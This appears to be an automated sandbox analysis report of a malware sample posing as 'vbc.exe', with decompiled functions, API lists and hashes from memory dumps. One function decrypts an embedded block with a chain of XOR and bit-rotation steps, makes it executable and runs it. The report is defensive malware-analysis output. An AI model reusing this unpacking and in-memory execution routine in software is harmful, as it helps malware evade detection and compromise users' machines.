                                                  0x0040670f
                                                  0x00406712
                                                  0x00406718
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671d
                                                  0x00000000
                                                  0x00000000
                                                  0x004064cb
                                                  0x004064cb
                                                  0x004064ce
                                                  0x00000000
                                                  0x00000000
                                                  0x0040680a
                                                  0x0040680e
                                                  0x00406830
                                                  0x00406833
                                                  0x0040683d
                                                  0x00000000
                                                  0x0040683d
                                                  0x00406810
                                                  0x00406813
                                                  0x00406817
                                                  0x0040681a
                                                  0x0040681a
                                                  0x0040681d
                                                  0x00000000
                                                  0x00000000
                                                  0x004068c7
                                                  0x004068cb
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068f0
                                                  0x004068f7
                                                  0x004068fe
                                                  0x004068fe
                                                  0x00000000
                                                  0x004068fe
                                                  0x004068cd
                                                  0x004068d0
                                                  0x004068d3
                                                  0x004068d6
                                                  0x004068dd
                                                  0x00406821
                                                  0x00406821
                                                  0x00406824
                                                  0x00000000
                                                  0x00000000
                                                  0x004069b8
                                                  0x004069bb
                                                  0x00000000
                                                  0x00000000
                                                  0x004065f2
                                                  0x004065f4
                                                  0x004065fb
                                                  0x004065fc
                                                  0x004065fe
                                                  0x00406601
                                                  0x00000000
                                                  0x00000000
                                                  0x00406609
                                                  0x0040660c
                                                  0x0040660f
                                                  0x00406611
                                                  0x00406613
                                                  0x00406613
                                                  0x00406614
                                                  0x00406617
                                                  0x0040661e
                                                  0x00406621
                                                  0x0040662f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406905
                                                  0x00406905
                                                  0x00406908
                                                  0x0040690f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406914
                                                  0x00406914
                                                  0x00406918
                                                  0x00406a50
                                                  0x00000000
                                                  0x00406a50
                                                  0x0040691e
                                                  0x00406921
                                                  0x00406924
                                                  0x00406928
                                                  0x0040692b
                                                  0x00406931
                                                  0x00406933
                                                  0x00406933
                                                  0x00406933
                                                  0x00406936
                                                  0x00406939
                                                  0x00406939
                                                  0x00406939
                                                  0x00406939
                                                  0x0040693c
                                                  0x0040693c
                                                  0x00406940
                                                  0x004069a0
                                                  0x004069a3
                                                  0x004069a8
                                                  0x004069a9
                                                  0x004069ab
                                                  0x004069ad
                                                  0x004069b0
                                                  0x00000000
                                                  0x004069b0
                                                  0x00406942
                                                  0x00406948
                                                  0x0040694b
                                                  0x0040694e
                                                  0x00406951
                                                  0x00406954
                                                  0x00406957
                                                  0x0040695a
                                                  0x0040695d
                                                  0x00406960
                                                  0x00406963
                                                  0x0040697c
                                                  0x0040697f
                                                  0x00406982
                                                  0x00406985
                                                  0x00406989
                                                  0x0040698b
                                                  0x0040698b
                                                  0x0040698c
                                                  0x0040698f
                                                  0x00406965
                                                  0x00406965
                                                  0x0040696d
                                                  0x00406972
                                                  0x00406974
                                                  0x00406977
                                                  0x00406977
                                                  0x00406992
                                                  0x00406999
                                                  0x00000000
                                                  0x0040699b
                                                  0x00000000
                                                  0x0040699b
                                                  0x00000000
                                                  0x00406637
                                                  0x0040663a
                                                  0x00406670
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a3
                                                  0x004067a3
                                                  0x004067a6
                                                  0x004067a8
                                                  0x00406a32
                                                  0x00000000
                                                  0x00406a32
                                                  0x004067ae
                                                  0x004067b1
                                                  0x00000000
                                                  0x00000000
                                                  0x004067b7
                                                  0x004067bb
                                                  0x004067be
                                                  0x004067be
                                                  0x004067be
                                                  0x00000000
                                                  0x004067be
                                                  0x0040663c
                                                  0x0040663e
                                                  0x00406640
                                                  0x00406642
                                                  0x00406645
                                                  0x00406646
                                                  0x00406648
                                                  0x0040664a
                                                  0x0040664d
                                                  0x00406650
                                                  0x00406666
                                                  0x0040666b
                                                  0x004066a3
                                                  0x004066a3
                                                  0x004066a7
                                                  0x004066d3
                                                  0x004066d5
                                                  0x004066dc
                                                  0x004066df
                                                  0x004066e2
                                                  0x004066e2
                                                  0x004066e7
                                                  0x004066e7
                                                  0x004066e9
                                                  0x004066ec
                                                  0x004066f3
                                                  0x004066f6
                                                  0x00406723
                                                  0x00406723
                                                  0x00406726
                                                  0x00406729
                                                  0x0040679d
                                                  0x0040679d
                                                  0x0040679d
                                                  0x00000000
                                                  0x0040679d
                                                  0x0040672b
                                                  0x00406731
                                                  0x00406734
                                                  0x00406737
                                                  0x0040673a
                                                  0x0040673d
                                                  0x00406740
                                                  0x00406743
                                                  0x00406746
                                                  0x00406749
                                                  0x0040674c
                                                  0x00406765
                                                  0x00406767
                                                  0x0040676a
                                                  0x0040676b
                                                  0x0040676e
                                                  0x00406770
                                                  0x00406773
                                                  0x00406775
                                                  0x00406777
                                                  0x0040677a
                                                  0x0040677c
                                                  0x0040677f
                                                  0x00406783
                                                  0x00406785
                                                  0x00406785
                                                  0x00406786
                                                  0x00406789
                                                  0x0040678c
                                                  0x0040674e
                                                  0x0040674e
                                                  0x00406756
                                                  0x0040675b
                                                  0x0040675d
                                                  0x00406760
                                                  0x00406760
                                                  0x0040678f
                                                  0x00406796
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00000000
                                                  0x00406798
                                                  0x00000000
                                                  0x00406798
                                                  0x00406796
                                                  0x004066a9
                                                  0x004066ac
                                                  0x004066ae
                                                  0x004066b1
                                                  0x004066b4
                                                  0x004066b7
                                                  0x004066b9
                                                  0x004066bc
                                                  0x004066bf
                                                  0x004066bf
                                                  0x004066c2
                                                  0x004066c2
                                                  0x004066c5
                                                  0x004066cc
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x00000000
                                                  0x004066ce
                                                  0x00000000
                                                  0x004066ce
                                                  0x004066cc
                                                  0x00406652
                                                  0x00406655
                                                  0x00406657
                                                  0x0040665a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406544
                                                  0x00406544
                                                  0x00406548
                                                  0x00406a0e
                                                  0x00000000
                                                  0x00406a0e
                                                  0x0040654e
                                                  0x00406551
                                                  0x00406554
                                                  0x00406557
                                                  0x00406559
                                                  0x00406559
                                                  0x00406559
                                                  0x0040655c
                                                  0x0040655f
                                                  0x00406562
                                                  0x00406565
                                                  0x00406568
                                                  0x0040656b
                                                  0x0040656c
                                                  0x0040656e
                                                  0x0040656e
                                                  0x0040656e
                                                  0x00406571
                                                  0x00406574
                                                  0x00406577
                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657d
                                                  0x00000000
                                                  0x00000000
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c5
                                                  0x00000000
                                                  0x00000000
                                                  0x004067cb
                                                  0x004067ce
                                                  0x004067d1
                                                  0x004067d4
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d9
                                                  0x004067dc
                                                  0x004067df
                                                  0x004067e2
                                                  0x004067e5
                                                  0x004067e8
                                                  0x004067e9
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067ee
                                                  0x004067f1
                                                  0x004067f4
                                                  0x004067f7
                                                  0x004067fa
                                                  0x004067fe
                                                  0x00406800
                                                  0x00406803
                                                  0x00000000
                                                  0x00406805
                                                  0x00000000
                                                  0x00406805
                                                  0x00406803
                                                  0x00406a38
                                                  0x00000000
                                                  0x00000000
                                                  0x00406067

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                                                  • Instruction ID: bc715f9ab80968e75e2fbed037c5f1c5951903de2449374fee89636cff417fa3
                                                  • Opcode Fuzzy Hash: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                                                  • Instruction Fuzzy Hash: 52F18571D00229CBCF28DFA8C8946ADBBB1FF45305F25816ED856BB281D3785A96CF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 73055990, Relevance: 4.7, APIs: 3, Instructions: 178memoryCOMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E73055990(void* __ecx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				long _v20;
				void* _t122;
				void* _t220;

				_t220 = __ecx;
				_v16 = _v16 & 0x00000000;
				_t122 = RtlAllocateHeap(GetProcessHeap(), 1, 0xbebc200); // executed
				_v16 = _t122;
				if(_v16 != 0) {
					E73055C10(_t220, _v16, 0xbebc200);
					_v12 = _v12 & 0x00000000;
					_v12 = _v12 & 0x00000000;
					while(_v12 < 0x131b) {
						_t14 =  &E73066000 + _v12; // 0xfffffd00
						_v5 =  *_t14;
						_v5 = _v5 & 0x000000ff ^ 0x00000044;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + 0xd6;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ 0x0000000a;
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
						_v5 = _v5 & 0x000000ff ^ 0x00000044;
						_v5 = (_v5 & 0x000000ff) - 0x2a;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ 0x0000000f;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 = _v5 & 0x000000ff ^ 0x00000055;
						_v5 = (_v5 & 0x000000ff) - 0x8f;
						_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) - 0x44;
						_v5 = _v5 & 0x000000ff ^ 0x000000f8;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) - 0x55;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
						_v5 = (_v5 & 0x000000ff) + _v12;
						 *((char*)( &E73066000 + _v12)) = _v5;
						_v12 = _v12 + 1;
					}
					VirtualProtect( &E73066000, 0x131b, 0x40,  &_v20); // executed
					E73066000(); // executed
				}
				return 0;
			}









                                                  0x73055990
                                                  0x73055996
                                                  0x730559a8
                                                  0x730559ae
                                                  0x730559b5
                                                  0x730559c3
                                                  0x730559ca
                                                  0x730559ce
                                                  0x730559db
                                                  0x730559eb
                                                  0x730559f1
                                                  0x730559fb
                                                  0x73055a04
                                                  0x73055a17
                                                  0x73055a21
                                                  0x73055a2a
                                                  0x73055a36
                                                  0x73055a40
                                                  0x73055a4a
                                                  0x73055a53
                                                  0x73055a5d
                                                  0x73055a67
                                                  0x73055a70
                                                  0x73055a7a
                                                  0x73055a84
                                                  0x73055a8e
                                                  0x73055aa1
                                                  0x73055aab
                                                  0x73055abe
                                                  0x73055ac8
                                                  0x73055ad2
                                                  0x73055adb
                                                  0x73055ae5
                                                  0x73055aef
                                                  0x73055af9
                                                  0x73055b05
                                                  0x73055b18
                                                  0x73055b22
                                                  0x73055b2c
                                                  0x73055b35
                                                  0x73055b3f
                                                  0x73055b4b
                                                  0x73055b54
                                                  0x73055b5e
                                                  0x73055b68
                                                  0x73055b71
                                                  0x73055b7b
                                                  0x73055b8e
                                                  0x73055b98
                                                  0x73055baa
                                                  0x73055bb4
                                                  0x73055bbd
                                                  0x730559d8
                                                  0x730559d8
                                                  0x73055bd8
                                                  0x73055be3
                                                  0x73055be3
                                                  0x73055be8

                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000001,0BEBC200), ref: 730559A1
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 730559A8
                                                  • VirtualProtect.KERNEL32(73066000,0000131B,00000040,?), ref: 73055BD8
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.477841571.0000000073051000.00000020.00020000.sdmp, Offset: 73050000, based on PE: true
                                                  • Associated: 00000004.00000002.477833776.0000000073050000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477858734.0000000073061000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477866753.0000000073066000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477871923.0000000073068000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477876122.0000000073069000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477882302.000000007306B000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Heap$AllocateProcessProtectVirtual
                                                  • String ID:
                                                  • API String ID: 1791181427-0
                                                  • Opcode ID: 075d8a8aa2983f791059ff2c42a57de269695a3527c862936603c0b7fd94ced5
                                                  • Instruction ID: d9d5944e85bf903f9ed358b3f2531a2418e3cfcb7bf9d0a2ff01a5ce425ad348
                                                  • Opcode Fuzzy Hash: 075d8a8aa2983f791059ff2c42a57de269695a3527c862936603c0b7fd94ced5
                                                  • Instruction Fuzzy Hash: 21816464C4D2DCADDB06CBE944557FDBFB05E26102F0845DAE0E5B6283C13A938EDB25
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405E93, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00405E93(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x422588); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x422588;
			}




                                                  0x00405e9e
                                                  0x00405ea7
                                                  0x00000000
                                                  0x00405eb4
                                                  0x00405eaa
                                                  0x00000000

                                                  APIs
                                                  • FindFirstFileA.KERNEL32(?,00422588,00421940,004057AF,00421940,00421940,00000000,00421940,00421940,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405E9E
                                                  • FindClose.KERNEL32(00000000), ref: 00405EAA
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                                                  • Instruction ID: 22d16aeb20e1d117df59da4f29a20059377f8c00669f4036672bdba2b414caf9
                                                  • Opcode Fuzzy Hash: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                                                  • Instruction Fuzzy Hash: 95D0123190D520ABD7015738BD0C84B7A59DB553323508F32B465F53E0C7788D928AEA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004035EB, Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 96%
                                                  			E004035EB(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t60;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				struct HINSTANCE__* _t76;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t85;

				_t81 =  *0x423f50; // 0x520d18
				_t20 = E00405F28(3);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x420538;
					"1033" = 0x7830;
					E00405A7F(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420538, 0);
					__eflags =  *0x420538;
					if(__eflags == 0) {
						E00405A7F(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407342, 0x420538, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405AF6("1033",  *_t20() & 0x0000ffff);
				}
				E004038B4(_t76, _t88);
				_t24 =  *0x423f58; // 0x80
				_t84 = "C:\\Users\\Albus\\AppData\\Local\\Temp";
				 *0x423fc0 = _t24 & 0x00000020;
				 *0x423fdc = 0x10000;
				if(E0040576C(_t88, "C:\\Users\\Albus\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040576C(_t96, _t84) == 0) {
						E00405BBA(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x423f40, 0x67, 1, 0, 0, 0x8040);
					 *0x423728 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E004038B4(_t76, __eflags);
							__eflags =  *0x423fe0; // 0x0
							if(__eflags != 0) {
								_t31 = E00404F56(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42370c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420510, 5); // executed
							_t37 = E00405EBA("RichEd20"); // executed
							__eflags = _t37;
							if(_t37 == 0) {
								E00405EBA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x4236e0);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x4236e0);
								 *0x423704 = _t85;
								RegisterClassA(0x4236e0);
							}
							_t39 =  *0x423720; // 0x0
							_t42 = DialogBoxParamA( *0x423f40, _t39 + 0x00000069 & 0x0000ffff, 0, E00403981, 0); // executed
							E0040353B(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x423f40; // 0x400000
						 *0x4236f4 = _t28;
						_v20 = 0x624e5f;
						 *0x4236e4 = E00401000;
						 *0x4236f0 = _t76;
						 *0x423704 =  &_v20;
						if(RegisterClassA(0x4236e0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420510 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423f40, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t60 =  *0x423f78; // 0x5256c8
					_t79 = 0x422ee0;
					E00405A7F( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) + _t60, 0x422ee0, 0);
					_t62 =  *0x422ee0; // 0x6b
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x422ee1;
						 *((char*)(E004056B6(0x422ee1, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405B98(_t84, E0040568B(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E004056D2(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}





























                                                  0x004035f1
                                                  0x004035fa
                                                  0x00403601
                                                  0x00403603
                                                  0x00403617
                                                  0x00403629
                                                  0x00403633
                                                  0x00403638
                                                  0x0040363e
                                                  0x00403651
                                                  0x00403651
                                                  0x0040365c
                                                  0x00403605
                                                  0x00403610
                                                  0x00403610
                                                  0x00403661
                                                  0x00403666
                                                  0x0040366b
                                                  0x00403674
                                                  0x00403679
                                                  0x0040368a
                                                  0x00403711
                                                  0x00403719
                                                  0x00403722
                                                  0x00403722
                                                  0x00403738
                                                  0x0040373e
                                                  0x0040374c
                                                  0x004037db
                                                  0x004037e3
                                                  0x004037ed
                                                  0x004037f2
                                                  0x004037f8
                                                  0x00403882
                                                  0x00403887
                                                  0x00403889
                                                  0x004038a5
                                                  0x00000000
                                                  0x004038a5
                                                  0x0040388b
                                                  0x00403891
                                                  0x00403899
                                                  0x00403899
                                                  0x00000000
                                                  0x00403891
                                                  0x00403806
                                                  0x00403811
                                                  0x00403816
                                                  0x00403818
                                                  0x0040381f
                                                  0x0040381f
                                                  0x0040382a
                                                  0x00403832
                                                  0x00403834
                                                  0x00403836
                                                  0x0040383f
                                                  0x00403842
                                                  0x00403848
                                                  0x00403848
                                                  0x0040384e
                                                  0x00403867
                                                  0x00403878
                                                  0x00000000
                                                  0x0040387d
                                                  0x004037e5
                                                  0x004037e7
                                                  0x00000000
                                                  0x00403752
                                                  0x00403752
                                                  0x00403758
                                                  0x00403762
                                                  0x0040376a
                                                  0x00403774
                                                  0x0040377a
                                                  0x00403788
                                                  0x004038aa
                                                  0x004038aa
                                                  0x00000000
                                                  0x004038aa
                                                  0x0040378e
                                                  0x00403797
                                                  0x004037d6
                                                  0x00000000
                                                  0x004037d6
                                                  0x00403690
                                                  0x00403690
                                                  0x00403695
                                                  0x00000000
                                                  0x00000000
                                                  0x0040369a
                                                  0x0040369f
                                                  0x004036af
                                                  0x004036b4
                                                  0x004036bb
                                                  0x00000000
                                                  0x00000000
                                                  0x004036bf
                                                  0x004036c1
                                                  0x004036ce
                                                  0x004036ce
                                                  0x004036d6
                                                  0x004036dc
                                                  0x00403704
                                                  0x0040370c
                                                  0x00000000
                                                  0x004036ee
                                                  0x004036ef
                                                  0x004036f8
                                                  0x004036fe
                                                  0x004036ff
                                                  0x00000000
                                                  0x004036ff
                                                  0x004036fa
                                                  0x004036fc
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004036fc
                                                  0x004036dc

                                                  APIs
                                                    • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                    • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?,?,?,00403165,0000000D), ref: 00405F55
                                                  • lstrcatA.KERNEL32(1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\Public\vbc.exe" ,00000000), ref: 0040365C
                                                  • lstrlenA.KERNEL32(ksurfviwic,?,?,?,ksurfviwic,00000000,C:\Users\user\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 004036D1
                                                  • lstrcmpiA.KERNEL32(?,.exe,ksurfviwic,?,?,?,ksurfviwic,00000000,C:\Users\user\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000), ref: 004036E4
                                                  • GetFileAttributesA.KERNEL32(ksurfviwic), ref: 004036EF
                                                  • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403738
                                                    • Part of subcall function 00405AF6: wsprintfA.USER32 ref: 00405B03
                                                  • RegisterClassA.USER32 ref: 0040377F
                                                  • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403797
                                                  • CreateWindowExA.USER32 ref: 004037D0
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403806
                                                  • GetClassInfoA.USER32(00000000,RichEdit20A,004236E0), ref: 00403832
                                                  • GetClassInfoA.USER32(00000000,RichEdit,004236E0), ref: 0040383F
                                                  • RegisterClassA.USER32(004236E0), ref: 00403848
                                                  • DialogBoxParamA.USER32 ref: 00403867
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: "C:\Users\Public\vbc.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$ksurfviwic$6B
                                                  • API String ID: 1975747703-3408721698
                                                  • Opcode ID: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                                                  • Instruction ID: 6624008b3449f808402c67b3262d240ca0850aee1e0dcbc9c28568ef27b6b269
                                                  • Opcode Fuzzy Hash: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                                                  • Instruction Fuzzy Hash: 6A61E9B17002047EE620AF619D45E3B7ABCEB4474AF40457FF941B22E2D77D9E428A2D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402C55, Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 80%
                                                  			E00402C55(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				signed int _t54;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\Public\\vbc.exe";
				 *0x423f4c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\Public\\vbc.exe", 0x400);
				_t89 = E0040586F(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409014 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\Public";
				E00405B98("C:\\Users\\Public", _t91);
				E00405B98(0x42c000, E004056D2(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x41f0e8 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BF1(1);
					__eflags =  *0x423f54 - _t82; // 0x8200
					if(__eflags == 0) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						_t54 =  *0x423f54; // 0x8200
						E004030B3(_t54 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402E8E(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
